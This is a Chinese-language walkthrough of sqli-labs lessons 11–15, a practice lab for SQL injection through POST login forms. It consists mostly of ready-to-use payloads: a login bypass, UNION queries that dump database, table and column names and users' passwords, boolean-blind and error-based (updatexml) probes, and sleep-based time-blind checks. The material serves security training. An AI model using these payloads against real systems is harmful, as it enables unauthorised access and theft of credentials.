Less-11
此关是Post类型的注入
代码分析

输入框可以使用密码来登录
username输入admin' or 1=1#,password随便输入一个字符,此处已经被#所注释
使用union进行联合注入
username输入 1' union select 1,database()#password随意字符

1.查询所有数据库
1admin' union select 1,group_concat(schema_name) from information_schema.schemata#
2.接下来查询表名等
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

3.查询列名
-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
4.查询username,password
-1' union select (select group_concat(username) from users), (select group_concat(password) from users)#

Less12
代码分析

payload
1") union select 1,user()##只需把上一关的Payload中的'替换为")即可注入

Less13
代码分析

布尔注入(图中打错字了,应该是没有回显,可以使用布尔注入…)
猜测数据库名
admin')and substr(database(),1,1)='s'#
依次往下,使用之前的布尔注入语句
也可以使用报错注入
-1') and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

Less14
代码分析

布尔注入
admin" and substr(database(),1,1)='s'##"闭合,往下的payload只需更换之前布尔注入的"即可

Less15
代码分析

1.判断数据库长度
admin' and If(length(database())=8,1,sleep(5))##IF()函数,length(database())=8为判断条件,条件正确执行1,条件错误为sleep(5)


2.判断数据库名:
admin' and If(substr(database(),1,1)='s',1,sleep(5))--+
剩下的和第九关时间盲注类似第九关时间盲注链接